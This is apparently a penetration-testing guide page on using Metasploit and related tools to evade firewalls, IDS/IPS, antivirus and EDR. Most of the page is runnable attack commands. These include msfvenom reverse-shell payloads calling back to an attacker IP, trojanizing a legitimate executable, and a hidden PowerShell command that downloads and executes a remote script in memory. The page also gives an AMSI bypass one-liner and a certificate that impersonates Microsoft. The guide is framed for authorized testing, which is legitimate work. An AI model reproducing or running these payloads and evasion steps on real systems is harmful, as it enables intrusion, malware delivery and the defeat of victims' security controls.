🛡️ Firewall & IDS/IPS Evasion¶

During a real-world engagement, your payloads and exploit traffic will encounter network-level defenses (firewalls, IDS/IPS) and host-level defenses (antivirus, EDR). This page covers techniques for bypassing these controls using Metasploit and complementary tools.

1️⃣ Understanding the Defenses¶

Defense	Layer	How It Works
Firewall	Network	Blocks traffic based on IP, port, protocol, and direction rules.
IDS (Intrusion Detection System)	Network	Monitors traffic and alerts on known attack signatures. Does not block.
IPS (Intrusion Prevention System)	Network	Like IDS, but actively blocks malicious traffic in real-time.
Antivirus (AV)	Host	Scans files on disk for known malware signatures and heuristics.
EDR (Endpoint Detection & Response)	Host	Monitors process behavior, memory, and API calls in real-time. Goes beyond file scanning.

Concept

Evasion is a cat-and-mouse game. Techniques that worked yesterday may be detected today. Always test your payloads against the target's specific defenses in a lab before using them in an engagement.

2️⃣ Firewall Evasion¶

Using Common Egress Ports¶

Most firewalls allow outbound traffic on common ports. Use these for your reverse shells:

# Port 443 (HTTPS) — almost always allowed outbound
msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=10.10.14.2 LPORT=443 \
  -f exe -o shell_443.exe

# Port 80 (HTTP)
msfvenom -p windows/x64/meterpreter/reverse_http \
  LHOST=10.10.14.2 LPORT=80 \
  -f exe -o shell_80.exe

# Port 53 (DNS) — often allowed for DNS resolution
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=53 \
  -f exe -o shell_53.exe

Tip

reverse_https on port 443 is the gold standard for firewall evasion. The traffic looks like normal HTTPS browsing and is encrypted, making deep packet inspection (DPI) much harder.

Encrypted Payloads (HTTPS)¶

# In MSFconsole, set up an HTTPS handler
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_https
msf6 > set LHOST 10.10.14.2
msf6 > set LPORT 443
msf6 > set HandlerSSLCert /path/to/your/cert.pem    # Use a custom SSL cert
msf6 > exploit -j

Using a valid SSL certificate (e.g., from Let's Encrypt) makes the traffic indistinguishable from legitimate HTTPS browsing.

3️⃣ IDS/IPS Evasion¶

Payload Fragmentation¶

IDS/IPS systems reassemble packets to inspect payloads. Fragmenting your traffic can sometimes bypass older systems:

# In Nmap (for initial scanning)
nmap -f -sS -p 445 10.10.10.5         # Fragment packets
nmap --mtu 16 -sS -p 445 10.10.10.5   # Custom MTU fragmentation

Timing and Throttling¶

Slow down your scans and exploit attempts to avoid triggering rate-based IDS alerts:

# Nmap slow scan
nmap -T1 -sV -p- 10.10.10.5     # Paranoid timing (very slow but stealthy)

# In Metasploit, reduce thread count and add delays
set THREADS 1
set ConnectTimeout 30

Protocol Manipulation¶

Some IDS/IPS rules expect traffic to follow standard protocol formats. Deviating can bypass rule matching:

# Use non-standard HTTP methods or malformed headers
# (Configured within specific exploit modules)
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

4️⃣ Antivirus Evasion¶

Metasploit Evasion Modules¶

Metasploit includes dedicated evasion modules (introduced in MSF 5):

msf6 > show evasion

# Example: Generate a Windows EXE that evades AV
msf6 > use evasion/windows/windows_defender_exe
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 10.10.14.2
msf6 > set LPORT 4444
msf6 > run

Multi-Encoding (MSFVenom)¶

# Apply multiple encoding passes
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -e x86/shikata_ga_nai -i 7 \
  -f exe -o encoded_shell.exe

Note

Multi-encoding with shikata_ga_nai is no longer effective against modern AV. Vendors have signatures for the decoder stub itself. This technique is included for educational purposes.

Custom Executable Templates¶

# Inject payload into a legitimate executable
msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=10.10.14.2 LPORT=443 \
  -x /path/to/legitimate_app.exe -k \
  -f exe -o trojanized_app.exe

Sleep Techniques (Sandbox Evasion)¶

Many AV solutions run suspicious files in a sandbox for a few seconds to observe behavior. Adding a sleep delay can outlast the sandbox:

# In MSFconsole advanced options
set InitialAutoRunScript "sleep 60"
# Or use the PrependMigrate option to auto-migrate (buys time)
set PrependMigrate true
set PrependMigrateProc svchost.exe

5️⃣ Advanced Evasion Techniques¶

Process Hollowing¶

Replace the memory of a legitimate process with your payload:

# Meterpreter post module
meterpreter > run post/windows/manage/migrate

In-Memory Execution (Fileless)¶

Avoid writing to disk entirely by using PowerShell or reflective DLL injection:

# PowerShell-based payload delivery
msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=10.10.14.2 LPORT=443 \
  -f psh-reflection -o shell.ps1

# On the target (download and execute in memory)
powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.2/shell.ps1')"

SSL Certificate Pinning¶

Use a custom or legitimate SSL certificate to make HTTPS traffic blend in:

# Generate a self-signed cert impersonating a real site
openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
  -keyout server.key -out server.pem \
  -subj "/CN=www.microsoft.com/O=Microsoft/C=US"

# Use it in the handler
msf6 > set HandlerSSLCert /path/to/server.pem
msf6 > set StagerVerifySSLCert true

AMSI Bypass (Windows 10+)¶

AMSI (Anti-Malware Scan Interface) inspects PowerShell and .NET in real-time. Metasploit includes some AMSI bypass techniques, but they are frequently patched.

# In Meterpreter
meterpreter > load powershell
meterpreter > powershell_execute "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"

Note

AMSI bypasses are rapidly detected and patched by Microsoft. This specific one-liner has been detected since 2020. Current bypasses require more sophisticated obfuscation.

6️⃣ External Evasion Tools¶

Tool	Description
Veil	Framework for generating AV-evading payloads.
Shellter	Dynamic PE infector — injects shellcode into legitimate Windows executables.
Nim / Go / Rust compilers	Writing custom loaders in less-common languages can evade signature-based detection.
Donut	Converts .NET assemblies into position-independent shellcode for in-memory execution.
ScareCrow	EDR-focused evasion tool that uses direct syscalls and process injection.

7️⃣ Gotchas¶

Note

Test against the target's actual defenses. What bypasses Windows Defender may not bypass CrowdStrike or SentinelOne. Always identify the target's security stack during reconnaissance.

Note

Evasion is temporary. AV vendors update signatures daily. A payload that bypasses detection today may be flagged tomorrow. Generate fresh payloads for each engagement.

Note

Network-level evasion is separate from host-level evasion. Even if your payload evades AV, the network IDS/IPS may still detect the exploit traffic. You need to address both layers.

Note

Legal considerations. Some evasion techniques (e.g., disabling AV, tampering with security controls) may go beyond the scope of your authorized testing. Confirm with your client/scope document before using aggressive evasion techniques.

Warning

Evasion techniques are designed for authorized penetration testing. Using them to bypass security controls without permission is illegal and unethical.